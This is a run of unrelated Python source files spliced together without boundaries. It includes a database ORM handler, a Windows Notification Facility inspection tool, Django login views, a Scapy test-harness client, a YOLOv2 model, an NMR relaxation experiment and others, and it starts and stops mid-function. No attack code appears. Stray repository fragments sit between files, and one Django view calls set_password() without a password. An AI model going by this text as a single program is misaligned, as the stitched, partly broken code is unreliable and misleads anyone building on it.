Parameters ---------- value : `~sdssdb.connection.DatabaseConnection` A valid sdssdb database connection """ pdatabase, sdatabase = self._is_a_db(value) self.db = value if pdatabase: self.orm = 'peewee' elif sdatabase: self.orm = 'sqla' self._set_session() @staticmethod def _is_a_schema(value: db_type) -> List[bool]: """ Conditional check if input is a schema module """ is_module = inspect.ismodule(value) name = value.__name__ if is_module else '' pschema, sschema = is_module and 'peewee' in name, is_module and 'sqlalchemy' in name return [pschema, sschema] def _check_schema(self, value: Type[ModuleType]) -> None: """ Checks a sdssdb schema module file Given a schema module files, extracts relevant information on the ORM, database, schema name, and set of ORM models Parameters ---------- value : py module A valid sdssdb database schema module file """ pschema, sschema = self._is_a_schema(value) self.models = value self.db = getattr(value, 'database', None) self.schema = self.models.__name__.split('.', 2)[-1] if pschema: self.orm = 'peewee' elif sschema: self.orm = 'sqla' self._set_session() @property def connected(self) -> bool: """ Returns True if the database is connected """ return self.db.connected if self.db else None def _set_session(self): """ Sets the sqla database Session if db is connected """ if self.connected: self._session = self.db.Session() @property def session(self): """ A sqlalchemy database session needed for querying Returns ------- `~sqlalchemy.orm.session.Session` A sqlalchemy database session needed for querying Raises ------ AttributeError when the orm is "peewee" """ if self.orm == 'peewee': raise AttributeError('peewee ORMs do not use sessions. To query, access the model ' 'directly or load a sqlalchemy ORM') return self._session def load_schema(self, schema: str): """ Load an sdssdb schema module Loads an input sdssdb schema module name from the currently loaded database and into the handler. The input name can be dot-qualified as "[orm].[database].[schema]" and it will attempt to find and load the correct module. For example ``targetdb``, ``sdss5db.targetdb``, ``peewee.sdss5db.targetdb`` are all valid names. Parameters ---------- schema : str The name of an sdssdb schema module Raises ------ TypeError when the input is not a string BrainError when no database connection is present BrainError when no schema module is found by importlib.import_module """ if type(schema) != str: raise TypeError(f'Input {schema} must be a string.') if not self.db: raise BrainError(f'No db present. Cannot load schema {schema}.') orm = 'sqlalchemy' if self.orm == 'sqla' else 'peewee' dbname = self.db.dbname if self.db else '' if schema.count('.') == 0: modname = f'sdssdb.{orm}.{dbname}.{schema}' elif schema.count('.') == 1: modname = f'sdssdb.{orm}.{schema}' elif schema.count('.') == 2: modname = f'sdssdb.{schema}' else: modname = schema try: self.models = importlib.import_module(modname) except ModuleNotFoundError as e: raise BrainError(f'No module found matching {modname}') from e else: self.schema = self.models.__name__.split('.', 2)[-1] self.model = None def load_model(self, model: str): """ Loads an ORM model Loads an input ORM model name from the currently loaded database and schema into the handler. 
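For illustration: after ``load_schema('targetdb')``, a call like ``load_model('Target')`` would attach that schema's ``Target`` class, assuming such a model exists.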
Parameters ---------- model : str The name of an ORM model to load Raises ------ BrainError when no valid schema is set AttributeError when no model is found within the loaded schema """ if not self.models: raise BrainError('No valid schema set containing ORM models.') model_obj = getattr(self.models, model, None) if not model_obj: raise AttributeError(f'schema {self.schema} does not have model {model}') self.model = model_obj def close(self): """ Close database connections and sessions """ if self.orm == 'sqlalchemy': self.session.close() elif self.orm == 'peewee': self.db.close() 1-10 import os def setup(conf): if 'windows' in conf.env.VALID_PLATFORMS: conf.start_msg_setup() if conf.check_lib( ['kernel32', 'user32', 'advapi32', 'ole32', 'oleaut32', 'uuid', 'shell32'], includepath=[os.path.join(conf.path.parent.abspath(), 'api.windows')] ): conf.end_msg('from system') else: conf.end_msg('not found', color='RED') """ Copyright (c) 2018 . All Rights Reserved. https://blog.quarkslab.com/author/gwaby.html """ import ctypes import argparse import win32security from enum import Enum from hexdump import hexdump import sys from WellKnownWnfNames import g_WellKnownWnfNames # comment this if you don't have the file (you can generate it with ) ZwCreateWnfStateName = ctypes.windll.ntdll.ZwCreateWnfStateName ZwUpdateWnfStateData = ctypes.windll.ntdll.ZwUpdateWnfStateData ZwQueryWnfStateData = ctypes.windll.ntdll.ZwQueryWnfStateData RtlSubscribeWnfStateChangeNotification = ctypes.windll.ntdll.RtlSubscribeWnfStateChangeNotification RtlUnsubscribeWnfStateChangeNotification = ctypes.windll.ntdll.RtlUnsubscribeWnfStateChangeNotification CreateEventA = ctypes.windll.kernel32.CreateEventA WaitForSingleObject = ctypes.windll.kernel32.WaitForSingleObject CloseHandle = ctypes.windll.kernel32.CloseHandle GENERIC_ALL = 0x10000000 WNF_STATE_KEY = 0x41C64E6DA3BC0074 class WNF_STATE_NAME_bits(ctypes.LittleEndianStructure): _fields_ = [ ("Version", ctypes.c_ulonglong, 4), ("NameLifetime", ctypes.c_ulonglong, 2), ("DataScope", ctypes.c_ulonglong, 4), ("PermanentData", ctypes.c_ulonglong, 1), ("Unique", ctypes.c_ulonglong, 53), ("value", ctypes.c_ulonglong) ] class WNF_STATE_NAME_INTERNAL(ctypes.Union): _fields_ = [ ("b", WNF_STATE_NAME_bits), ("value", ctypes.c_ulonglong) ] class WNF_DATA_SCOPE(Enum): WnfDataScopeSystem, WnfDataScopeSession, WnfDataScopeUser, WnfDataScopeProcess, WnfDataScopeMachine = range(5) class WNF_STATE_NAME_LIFETIME(Enum): WnfWellKnownStateName, WnfPermanentStateName, WnfPersistentStateName, WnfTemporaryStateName = range(4) WnfLifetimeStrings = [ "Well-Known", "Permanent", "Volatile", "Temporary" ] WnfDataScopeStrings = [ "System", "session", "User", "Process", "Machine" ] class WnfCom(object): class NOTIFY_CONTEXT(ctypes.Structure): _fields_ = [ ("NotifyEvent", ctypes.c_ulong), ("EventDestroyed", ctypes.c_bool) ] def __init__(self, WnfName = 0): # generic stuff self.StateName = ctypes.c_ulonglong(0) self.internalName = WNF_STATE_NAME_INTERNAL() self.verbose = True if WnfName != 0: self.SetStateName(WnfName) # callback for the listener self.callback_type = ctypes.CFUNCTYPE( ctypes.c_ulonglong, ctypes.c_ulonglong, ctypes.c_ulong, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_ulong) self.callback = self.callback_type(self.NotifyCallback) # security descriptor used for creating the server part everyoneSid = win32security.CreateWellKnownSid(1, None) acl = win32security.ACL() acl.AddAccessAllowedAce(win32security.ACL_REVISION, GENERIC_ALL, everyoneSid) pySd = 
win32security.SECURITY_DESCRIPTOR() pySd.SetSecurityDescriptorDacl(True, acl, False) self.rawSd = ctypes.create_string_buffer(memoryview(pySd).tobytes()) def TooglePrint(self): self.verbose = not self.verbose def pprint(self, string): if self.verbose: print(string) def PrintInternalName(self): self.pprint("Encoded Name: {:x}, Clear Name: {:x}\n\t" "Version: {}, Permanent: {}, Scope: {}, Lifetime: {}, Unique: {}\n".format( self.StateName.value, self.internalName.value, self.internalName.b.Version, "Yes" if self.internalName.b.PermanentData else "No", WnfDataScopeStrings[self.internalName.b.DataScope], WnfLifetimeStrings[self.internalName.b.NameLifetime], self.internalName.b.Unique)) def SetStateName(self, WnfName): tmpName = 0 try: tmpName = g_WellKnownWnfNames[WnfName.upper()] except: if len(WnfName)>2 and WnfName[1] == 'x': WnfName = WnfName[2:] try: tmpName = int(WnfName, 16) except: tmpName = 0 self.pprint("[Error] Could not validate the provided name") return False self.StateName = ctypes.c_longlong(tmpName) self.internalName.value = ctypes.c_ulonglong(tmpName ^ WNF_STATE_KEY) return True def CreateServer(self): status = ZwCreateWnfStateName(ctypes.byref(self.StateName), WNF_STATE_NAME_LIFETIME.WnfTemporaryStateName.value, WNF_DATA_SCOPE.WnfDataScopeMachine.value, False, 0, 0x1000, self.rawSd) if status != 0: self.pprint("[Error] Failed: {}".format(status)) return 0 self.pprint("[SERVER] StateName created: {:x}\n".format(self.StateName.value)) self.internalName.value = ctypes.c_ulonglong(self.StateName.value ^ WNF_STATE_KEY) return self.StateName.value def Write(self, Data = b"Hello World"): if self.StateName.value == 0: self.pprint("[Error] Server not initialized. Use CreateServer() or SetStateName().") return 0 if type(Data) != bytes: self.pprint("[Error] Could not read the data. Bytes string is expected.") return 0 self.PrintInternalName() dataBuffer = ctypes.c_char_p(Data) bufferSize = len(Data) status = ZwUpdateWnfStateData(ctypes.byref(self.StateName), dataBuffer, bufferSize, 0, 0, 0, 0) status = ctypes.c_ulong(status).value if status != 0: self.pprint("[Error] Could not write: 0x{:x}\n\t Maybe the data is too big or you don't have write access?".format(status)) else: self.pprint("State update: {} bytes written\n".format(bufferSize)) return status def Read(self): if self.StateName.value == 0: self.pprint("[Error] Client not initialized. Use SetStateName() to set a state name.") return False changeStamp = ctypes.c_ulong(0) dataBuffer = ctypes.create_string_buffer(4096) bufferSize = ctypes.c_ulong(ctypes.sizeof(dataBuffer)) res = ZwQueryWnfStateData(ctypes.byref(self.StateName), 0, 0, ctypes.byref(changeStamp), ctypes.byref(dataBuffer), ctypes.byref(bufferSize) ) bufferSize = 0 if res !=0 else bufferSize.value hexdump(dataBuffer.raw[0:bufferSize]) return changeStamp.value, dataBuffer, bufferSize def Listen(self): if self.StateName.value == 0: self.pprint("[Error] Server not initialized. 
Use CreateServer() or SetStateName().") return False wnfSubscription = ctypes.c_void_p(0) notifyContext = self.NOTIFY_CONTEXT() notifyContext.EventDestroyed = False notifyContext.NotifyEvent = CreateEventA(0, 0, 0, 0) if(notifyContext.NotifyEvent == 0): self.pprint("[Error] Could not create event") return False self.pprint("[CLIENT]: Event registered: {}\n".format(notifyContext.NotifyEvent)) res = RtlSubscribeWnfStateChangeNotification( ctypes.byref(wnfSubscription), self.StateName, 0, self.callback, ctypes.byref(notifyContext), 0, 0, 0) if res != 0: self.pprint("[Error] WNF Sub Failed: {:x}".format(ctypes.c_ulong(res).value)) CloseHandle(notifyContext.NotifyEvent) return False while not notifyContext.EventDestroyed: try: WaitForSingleObject(notifyContext.NotifyEvent, 1500) except KeyboardInterrupt: break self.pprint("[CLIENT]: Shutting down...") CloseHandle(notifyContext.NotifyEvent) RtlUnsubscribeWnfStateChangeNotification(wnfSubscription) return True def NotifyCallback (self, StateName, ChangeStamp, TypeId, CallbackContext, Buffer, BufferSize): notifyContext = ctypes.cast(CallbackContext, ctypes.POINTER(self.NOTIFY_CONTEXT)) ArrayType = ctypes.c_char * BufferSize if Buffer == None and BufferSize == 0 and ChangeStamp == 0: self.pprint("[CLIENT]: NAME DESTROYED") notifyContext.contents.EventDestroyed = True else: buff = ctypes.cast(Buffer, ctypes.POINTER(ArrayType)).contents[:BufferSize] self.pprint("[CLIENT] Timestamp: 0x{:x} Size: 0x{:x}\n Data:".format( ChangeStamp, BufferSize)) output = b''.join(map(lambda x:x.to_bytes(1, byteorder='little'), buff)) hexdump(output) return 0 ############### MAIN ############### if __name__ == "__main__": argParser = argparse.ArgumentParser(description="") argParser.add_argument("WNF_NAME", nargs='?', type=str, help="state name") args = argParser.parse_args() wnfserver = WnfCom() if args.WNF_NAME: if not wnfserver.SetStateName(args.WNF_NAME): sys.exit("[Error] State name unknown.") else: wnfserver.CreateServer() wnfserver.Write() while True: try: Data = input(">") except KeyboardInterrupt as e: break wnfserver.Write(Data.encode()) wnfserver.Read()import logging import os import inspect ALL_LOGS_FILE = 'logs.log' class Singleton(type): _instances = {} def __call__(cls, *args, **kwargs): if cls not in cls._instances: cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs) return cls._instances[cls] class MyLogger(metaclass=Singleton): console_logger = None file_logger = None def __init__(self, all_logs_file_name=ALL_LOGS_FILE): logging.basicConfig( level=logging.INFO, format="%(asctime)s - %(threadName)s - %(filename)s - %(message)s", handlers=[ logging.StreamHandler() ]) all_logs_file_name = os.path.join(os.getcwd(), all_logs_file_name) fh = logging.FileHandler(all_logs_file_name) fh.setLevel(logging.INFO) fh.setFormatter(logging.Formatter("%(asctime)s - %(threadName)s - %(message)s")) logging.getLogger(__name__ + '.file_logger').addHandler(fh) self.file_logger = logging.getLogger(__name__ + '.file_logger') # console logger self.console_logger = logging.getLogger(__name__ + '.console_logger') @staticmethod def __get_call_info(): stack = inspect.stack() fn = stack[2][1] ln = stack[2][2] func = stack[2][3] return fn, func, ln def info(self, message, *args, file=False): if file: self.file_logger.info(message, *args) else: self.console_logger.info(message, *args) def debug(self, message, *args, file=True): if file: self.file_logger.debug(message, *args) else: self.console_logger.info(message, *args) def warning(self, message, *args, file=True): 
if file: self.file_logger.warning(message, *args) else: self.console_logger.warning(message, *args) def error(self, message, *args, exc_info=1, file=True): if file: self.file_logger.error(message, *args, exc_info=exc_info) else: self.console_logger.error(message, *args, exc_info=exc_info) def critical(self, message, *args, file=True): if file: self.file_logger.critical(message, *args) else: self.console_logger.critical(message, *args)#!/usr/bin/env python # -*- coding: utf-8 -*- from django.conf.urls import patterns, url from django.views.generic import ListView, DetailView from .views import ( MapView, AddView, ParamRowView, TestRowView, MeasurementView, DownloadView, ReportView, MeasurementPopupView ) from .models import Test urlpatterns = patterns( '', url(r'^map/', MapView.as_view(), name='observations-map'), url(r'^report/', ReportView.as_view(), name='observations-report'), url(r'^download/', DownloadView.as_view(), name='observations-download'), url(r'^detail/(?P\d+)/$', MeasurementView.as_view(), name='observations-detail'), url(r'^detail/(?P\d+)/popup/$', MeasurementPopupView.as_view(), name='observations-detail-popup'), url(r'^add/$', AddView.as_view(), name='observations-add'), url(r'^add/param/$', ParamRowView.as_view(), name='observations-add-param'), url(r'^add/test/$', TestRowView.as_view(), name='observations-add-test'), url(r'^tests/$', ListView.as_view( template_name='test_list.html', queryset=Test.objects.order_by('parameter__name') ), name='observations-tests'), url(r'^tests/(?P\d+)/$', DetailView.as_view( model=Test, template_name='test_detail.html' ), name='observations-test-detail'), ) 0 from django.shortcuts import render from django.http import HttpResponse, HttpResponseRedirect from pmpapp.forms import LoginForm, RegisterForm from django.contrib.auth import authenticate, login, logout from django.urls import reverse from django.contrib.auth.decorators import login_required # Create your views here. 
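# The views below cover a minimal auth flow: index renders the landing page,
# user_logout is gated by @login_required, register validates LoginForm and
# RegisterForm together before saving the profile, and user_login calls
# authenticate() and only logs the user in when the account is active.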
def index(request): return render(request, 'pmpapp/index.html') @login_required def user_logout(request): logout(request) return HttpResponseRedirect(reverse('pmp:index')) def register(request): registered = False if request.method == 'POST': loginForm = LoginForm(data=request.POST) registerForm = RegisterForm(data=request.POST) if loginForm.is_valid() and registerForm.is_valid(): user = loginForm.save() user.set_password() user.save() userInfo = registerForm.save(commit=False) userInfo.user = user if 'profile_picture' in request.FILES: userInfo.profile_picture = request.FILES['profile_picture'] userInfo.save() registered = True else: print(loginForm.errors, registerForm.errors) else: loginForm = LoginForm() registerForm = RegisterForm() return render(request, 'pmpapp/register.html', {'loginForm': loginForm, 'registerForm': RegisterForm, 'registered': registered}) def user_login(request): if request.method == 'POST': username = request.POST.get('username') password = request.POST.get('password') user = authenticate(username=username, password=password) if user: if user.is_active: login(request, user) return HttpResponseRedirect(reverse('pmp:index')) else: print('User account is inactive') else: print('login failed for user: {}'.format(username)) return HttpResponse('Invalid login credentials') else: return render(request, 'pmpapp/login.html', {}) import os, sys import pdb import time import torch import utils import argparse import importlib import numpy as np import torch.nn as nn import torch.optim as optim torch.cuda.set_device(0) device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") def save_base(model, instrument, num): data = np.load("/data1/xyf/base/" + instrument + "_train_data.npy") idx = np.random.permutation(data.shape[0]) base = [] for i in range(num): index = idx[i] X_test = torch.from_numpy(data[index]).unsqueeze(0) X_test = X_test.type(torch.FloatTensor).to(device) with torch.no_grad(): model.eval() L, map = model(X_test) L = L.view(-1).cpu().numpy() Relation_Map = map.squeeze(0).squeeze(0).cpu().numpy() index = L.argmax() index = Relation_Map[:,index].argmax() X_test = X_test.squeeze(0).cpu().numpy() W = X_test[:, index] base.append(W) np.save("./base_aug/"+instrument + "_base.npy", np.array(base),) print(instrument + " complete.") if __name__ == "__main__": model_path = "201812132050/snapshot.model" model = torch.load(model_path, map_location=lambda storage, loc: storage.cuda(0)) num = 300 save_base(model, "accordion", num) save_base(model, "acoustic_guitar", num) save_base(model, "cello", num) save_base(model, "flute", num) save_base(model, "saxophone", num) save_base(model, "trumpet", num) save_base(model, "violin", num) save_base(model, "xylophone", num) mykolaf/sonic-mgmtspytest/spytest/tgen/tg_scapy.py1-10 import os import sys import copy import logging class ScapyClient(object): def __init__(self, logger, port=8009): self.conn = None self.tg_port = port self.logger = logger or logging.getLogger() self.use_pyro = True self.filemode = bool(os.getenv("SPYTEST_FILE_MODE")) self.tg_ip = getattr(self, "tg_ip", None) self.tg_port_list = getattr(self, "tg_port_list", []) self.tg_port_handle = getattr(self, "tg_port_handle", {}) def log_call(self, fname, **kwargs): self.logger.info("TODO {} {}".format(fname, **kwargs)) def save_log(self, name, data): self.logger.info("TODO {} {}".format(name, data)) def api_fail(self, msg): self.logger.info("TODO {}".format(msg)) def log_info(self, *args): self.logger.info(*args) def server_control(self, phase, context): if 
self.filemode: return elif phase == "clean-all": self.execute(self.conn.server_control, "clean-all", "") elif phase == "pre-test": self.execute(self.conn.server_control, "add-log", "test-start " + context) elif phase == "post-test": self.execute(self.conn.server_control, "add-log", "test-finish " + context) elif phase == "pre-module-prolog": self.execute(self.conn.server_control, "init-log", context) elif phase == "post-module-epilog": data = self.execute(self.conn.server_control, "read-log", context) self.log_info("ScapyClient instrument: {} {}".format(phase, context)) context = "tests_{}".format(context.replace(".py", ".tgen")) context = context.replace("/", "_") self.log_info("ScapyClient instrument: {} {}".format(phase, context)) self.save_log(context, data) else: self.log_info("ScapyClient instrument: ignored {} {}".format(phase, context)) def rpyc_connect(self): import rpyc try: config={"allow_pickle" : True, "sync_request_timeout": 300, "allow_public_attrs": True, "allow_all_attrs": True, "instantiate_oldstyle_exceptions" : True} return rpyc.connect(self.tg_ip, self.tg_port, config=config) except Exception as e: print (e) raise ValueError("Failed to connect to scapy server {}".format(e)) def scapy_connect(self, dry_run=False): self.tg_ns = 'scapy' if self.filemode: return None if self.use_pyro: import Pyro4 uri = "PYRO:scapy-tgen@{}:{}".format(self.tg_ip, self.tg_port) Pyro4.config.SERIALIZER = "pickle" self.conn = Pyro4.Proxy(uri) else: self.conn2 = self.rpyc_connect() self.conn = self.conn2.root try: dbg_lvl = int(os.getenv("SPYTEST_SCAPY_DBG_LVL", "1")) except: dbg_lvl = 1 try: max_pps = int(os.getenv("SPYTEST_SCAPY_MAX_PPS", "100")) except: max_pps = 100 self.execute(self.conn.server_control, "set-dbg-lvl", dbg_lvl) self.execute(self.conn.server_control, "set-dry-run", dry_run) self.execute(self.conn.server_control, "set-max-pps", max_pps) self.execute(self.conn.server_control, "init-log", "default") res = self.tg_connect(port_list=self.tg_port_list) self.tg_port_handle.clear() for port in self.tg_port_list: self.tg_port_handle[port] = res['port_handle'][port] return None def log_api(self, *args, **kws): func = sys._getframe(1).f_code.co_name self.log_call(func, **kws) def fix_newstr(self, kws): from future.types import newstr for key, value in kws.items(): if isinstance(value, newstr): kws[key] = str(value) def execute(self, func, *args, **kws): try: res = func(*args, **kws) return copy.copy(res) except Exception as exp: msg = "{}".format(exp) if self.use_pyro: import Pyro4 msg = msg + "".join(Pyro4.util.getPyroTraceback()) self.api_fail(msg) raise exp def tg_connect(self, *args, **kws): self.log_api(*args, **kws) if self.filemode: return None return self.execute(self.conn.tg_connect, *args, **kws) def tg_disconnect(self, *args, **kws): self.log_api(*args, **kws) if self.filemode: return None return self.execute(self.conn.tg_disconnect, *args, **kws) def tg_traffic_control(self, *args, **kws): self.log_api(*args, **kws) if self.filemode: return None return self.execute(self.conn.tg_traffic_control, *args, **kws) def tg_interface_control(self, *args, **kws): self.log_api(*args, **kws) if self.filemode: return None return self.execute(self.conn.tg_interface_control, *args, **kws) def tg_packet_control(self, *args, **kws): self.log_api(*args, **kws) if self.filemode: return None return self.execute(self.conn.tg_packet_control, *args, **kws) def tg_packet_stats(self, *args, **kws): self.log_api(*args, **kws) if self.filemode: return None return 
self.execute(self.conn.tg_packet_stats, *args, **kws) def tg_traffic_config(self, *args, **kws): self.log_api(*args, **kws) if self.filemode: return None self.fix_newstr(kws) return self.execute(self.conn.tg_traffic_config, *args, **kws) def tg_interface_config(self, *args, **kws): self.log_api(*args, **kws) if self.filemode: return None return self.execute(self.conn.tg_interface_config, *args, **kws) def tg_traffic_stats(self, *args, **kws): self.log_api(*args, **kws) if self.filemode: return None return self.execute(self.conn.tg_traffic_stats, *args, **kws) def tg_emulation_bgp_config(self, *args, **kws): self.log_api(*args, **kws) if self.filemode: return None return self.execute(self.conn.tg_emulation_bgp_config, *args, **kws) def tg_emulation_bgp_route_config(self, *args, **kws): self.log_api(*args, **kws) if self.filemode: return None return self.execute(self.conn.tg_emulation_bgp_route_config, *args, **kws) def tg_emulation_bgp_control(self, *args, **kws): self.log_api(*args, **kws) if self.filemode: return None return self.execute(self.conn.tg_emulation_bgp_control, *args, **kws) def tg_emulation_igmp_config(self, *args, **kws): self.log_api(*args, **kws) if self.filemode: return None return self.execute(self.conn.tg_emulation_igmp_config, *args, **kws) def tg_emulation_multicast_group_config(self, *args, **kws): self.log_api(*args, **kws) if self.filemode: return None return self.execute(self.conn.tg_emulation_multicast_group_config, *args, **kws) def tg_emulation_multicast_source_config(self, *args, **kws): self.log_api(*args, **kws) if self.filemode: return None return self.execute(self.conn.tg_emulation_multicast_source_config, *args, **kws) def tg_emulation_igmp_group_config(self, *args, **kws): self.log_api(*args, **kws) if self.filemode: return None return self.execute(self.conn.tg_emulation_igmp_group_config, *args, **kws) def tg_emulation_igmp_control(self, *args, **kws): self.log_api(*args, **kws) if self.filemode: return None return self.execute(self.conn.tg_emulation_igmp_control, *args, **kws) import tensorflow as tf from util.process_box import compute_IOU from network.ConvBlock import conv2d_bn,bottleneck_block,bottleneck_block_v2 import numpy as np def YoloV2(input_shape,class_num=80,box_num=5): iw, ih, c = input_shape net = tf.Graph() with net.as_default(): x = tf.placeholder(tf.float32, shape=(None, iw, ih, c), name='x') anchors = tf.placeholder(tf.float32, shape=(box_num,2), name='anchors') anchors_reshape = tf.reshape(anchors,(1,1,box_num,2)) conv1 = conv2d_bn(x,32,(3,3),(1,1),padding='same',activation='leaky_relu') pool1 = tf.layers.max_pooling2d(conv1,(2,2),(2,2)) conv2 = conv2d_bn(pool1, 64, (3, 3), (1, 1), padding='same', activation='leaky_relu') pool2 = tf.layers.max_pooling2d(conv2, (2, 2), (2, 2)) conv5 = bottleneck_block(pool2, 128, 64) pool3 = tf.layers.max_pooling2d(conv5, (2, 2), (2, 2)) conv8 = bottleneck_block(pool3, 256, 128) pool4 = tf.layers.max_pooling2d(conv8, (2, 2), (2, 2)) conv13 = bottleneck_block_v2(pool4, 512, 256) pool5 = tf.layers.max_pooling2d(conv13, (2, 2), (2, 2)) conv18 = bottleneck_block_v2(pool5, 1024, 512) conv19 = conv2d_bn(conv18, 1024, (3, 3), (1, 1), padding='same', activation='leaky_relu') conv20 = conv2d_bn(conv19, 1024, (3, 3), (1, 1), padding='same', activation='leaky_relu') conv21 = conv2d_bn(conv13, 64, (1, 1), (1, 1), activation='leaky_relu') conv21_reshaped = tf.space_to_depth(conv21, block_size=2) concat1 = tf.concat([conv21_reshaped,conv20],axis=-1) conv22 = conv2d_bn(concat1, 1024, (3, 3), (1, 1), padding='same', 
activation='leaky_relu') conv23 = tf.layers.conv2d(conv22, box_num*(5+class_num), (1, 1), (1, 1),activation=None) boxes, confs, probes = predict_layer(conv23, anchors_reshape, class_num, conv23.shape[1], box_num) y = tf.placeholder(tf.float32, shape=(None, int(conv23.shape[1]) ** 2, 5 + class_num), name='y') y_hat = (probes, confs, boxes) net.add_to_collection('input', {'x': x, 'anchors': anchors}) net.add_to_collection('output', {'y_hat': y_hat}) return net def pred_cord_to_box(boxes_pred,size,anchors): """Convert YOLOv2 box predictions to bounding box cords(x,y,w,h).""" ind = np.reshape(np.asarray(range(size ** 2), dtype=np.float32), (1, size ** 2, 1, 1)) boxes_x = (tf.sigmoid(boxes_pred[..., 0:1]) + ind % size) / size boxes_y = (tf.sigmoid(boxes_pred[..., 1:2]) + ind // size) / size boxes_wh = tf.exp(boxes_pred[..., 2:4])*anchors / size boxes_w = boxes_wh[..., :1] boxes_h = boxes_wh[..., 1:2] boxes = tf.concat(( boxes_x, boxes_y, boxes_w, boxes_h ), axis=-1) return boxes def predict_layer(net_out,anchors,num_class,size,box_num): size=int(size) net_out = tf.reshape(net_out,(-1,size**2,box_num,5+num_class)) boxes_pred = net_out[..., :4] boxes = pred_cord_to_box(boxes_pred,size,anchors) box_confidence = tf.sigmoid(net_out[..., 4:5]) box_class_probs = tf.nn.softmax(net_out[..., 5:]) return boxes,box_confidence,box_class_probs def compute_loss(y_true,y_hat,lambd_coord=5,lambd_nonObj=.5): probes_hat, confs_hat, boxes_cord_hat = y_hat obj_mask = y_true[..., 0] confs_true = tf.expand_dims(obj_mask,axis=2) boxes_cord_true = tf.expand_dims(y_true[...,1:5],axis=2) probes_true = y_true[...,5:] IOU = compute_IOU(boxes_cord_true,boxes_cord_hat) IOU_max = tf.reshape(tf.reduce_max(confs_hat,axis=-1),(-1,confs_hat.shape[1],1)) box_mask = tf.cast(IOU >= IOU_max, dtype=tf.float32) * tf.reshape(obj_mask, (-1, confs_hat.shape[1], 1)) location_loss = tf.reduce_sum(tf.reduce_sum(box_mask*tf.reduce_sum(tf.pow(boxes_cord_hat-boxes_cord_true,2),axis=-1),axis=-1),axis=-1) conf_diff_sum_obj = tf.reduce_sum(box_mask*tf.pow(confs_hat - confs_true,2),axis=-1) conf_loss_obj = tf.reduce_sum(tf.reduce_sum(conf_diff_sum_obj,axis=-1),axis=-1) conf_diff_sum_nonObj = tf.reduce_sum((1-box_mask) * tf.pow(confs_hat - confs_true, 2), axis=-1) conf_loss_nonObj = tf.reduce_sum(tf.reduce_sum(conf_diff_sum_nonObj,axis=-1),axis=-1) class_loss = tf.reduce_sum(obj_mask*tf.reduce_sum(tf.pow(probes_hat-probes_true,2),axis=-1),axis=-1) loss = tf.reduce_mean(lambd_coord*location_loss+conf_loss_obj+lambd_nonObj*conf_loss_nonObj+class_loss) return loss if __name__ == '__main__': YoloV2((224,224,3)) src/nlp/entities.py import hunlp import pandas as pd import plac from tqdm import tqdm def extract_entities(texts): nlp = hunlp.HuNlp() entities = [list(nlp(text).entities) if type(text) == str else [] for text in tqdm(texts)] return entities def main(merged_tsv, entities_tsv): df = pd.read_csv(merged_tsv, sep="\t").set_index("Hash") df["Entities"] = extract_entities(df.Text.values) df[["Entities"]].to_csv(entities_tsv) if __name__ == '__main__': plac.call(main) from __future__ import annotations from dataclasses import dataclass from typing import Literal import numpy as np from numpy.typing import NDArray from chemex.configuration.data import RelaxationDataSettings from chemex.configuration.experiment import ExperimentConfig from chemex.configuration.experiment import RelaxationSettings from chemex.configuration.experiment import ToBeFitted from chemex.containers.data import Data from chemex.containers.dataset import load_relaxation_dataset 
from chemex.experiments.configurations import configurations from chemex.experiments.descriptions import descriptions from chemex.experiments.factories import Creators from chemex.experiments.factories import factories from chemex.filterers import PlanesFilterer from chemex.nmr.liouvillian import Basis from chemex.nmr.liouvillian import LiouvillianIS from chemex.nmr.spectrometer import Spectrometer from chemex.parameters.spin_system import SpinSystem from chemex.plotters import RelaxationPlotter from chemex.printers.data import RelaxationPrinter # Type definitions NDArrayFloat = NDArray[np.float_] NDArrayBool = NDArray[np.bool_] EXPERIMENT_NAME = "relaxation_hznz" class RelaxationHzNzSettings(RelaxationSettings): name: Literal["relaxation_hznz"] observed_state: Literal["a", "b", "c", "d"] = "a" @property def detection(self) -> str: return f"[2izsz_{self.observed_state}]" class RelaxationHzNzConfig( ExperimentConfig[RelaxationHzNzSettings, RelaxationDataSettings] ): @property def to_be_fitted(self) -> ToBeFitted: state = self.experiment.observed_state return ToBeFitted( rates=[f"r1a_is_{state}"], model_free=[f"tauc_{state}", f"s2_{state}", f"khh_{state}"], ) def build_spectrometer( config: RelaxationHzNzConfig, spin_system: SpinSystem ) -> Spectrometer: settings = config.experiment conditions = config.conditions basis = Basis(type="izsz", spin_system="nh") liouvillian = LiouvillianIS(spin_system, basis, conditions) spectrometer = Spectrometer(liouvillian) spectrometer.detection = settings.detection return spectrometer @dataclass class RelaxationHzNzSequence: settings: RelaxationHzNzSettings def calculate(self, spectrometer: Spectrometer, data: Data) -> np.ndarray: times = data.metadata # Getting the starting magnetization start = spectrometer.get_start_magnetization(["2izsz"]) # Return profile delays = spectrometer.delays(0.25 * np.array(times)) p180_i = spectrometer.perfect180_i[0] p180_s = spectrometer.perfect180_s[0] return np.array( [ spectrometer.detect( delay @ p180_s @ delay @ p180_i @ delay @ p180_s @ delay @ start ) for delay in delays ] ) def is_reference(self, metadata: NDArrayFloat) -> NDArrayBool: return np.full_like(metadata, False, dtype=np.bool_) def register(): creators = Creators( config_creator=RelaxationHzNzConfig, spectrometer_creator=build_spectrometer, sequence_creator=RelaxationHzNzSequence, dataset_creator=load_relaxation_dataset, filterer_creator=PlanesFilterer, printer_creator=RelaxationPrinter, plotter_creator=RelaxationPlotter, ) factories.register(type=EXPERIMENT_NAME, creators=creators) descriptions.register(EXPERIMENT_NAME, __package__, "description.md") configurations.register(EXPERIMENT_NAME, __package__, "config.toml") import numpy as np from pymt.grids.assertions import is_rectilinear, is_structured, is_unstructured def get_default_coordinate_units(n_dims): if n_dims <= 0 or n_dims > 3: raise ValueError("dimension must be between one and three") return ["-"] * n_dims def get_default_coordinate_names(n_dims): if n_dims <= 0 or n_dims > 3: raise ValueError("dimension must be between one and three") return ["z", "y", "x"][-n_dims:] def assert_arrays_are_equal_size(*args): first_size = args[0].size for arg in args[1:]: if arg.size != first_size: raise AssertionError("arrays are not the same length") def args_as_numpy_arrays(*args): np_arrays = [] for arg in args: if isinstance(arg, np.ndarray): np_array = arg.view() else: np_array = np.array(arg) np_array.shape = (np_array.size,) np_arrays.append(np_array) return tuple(np_arrays) def 
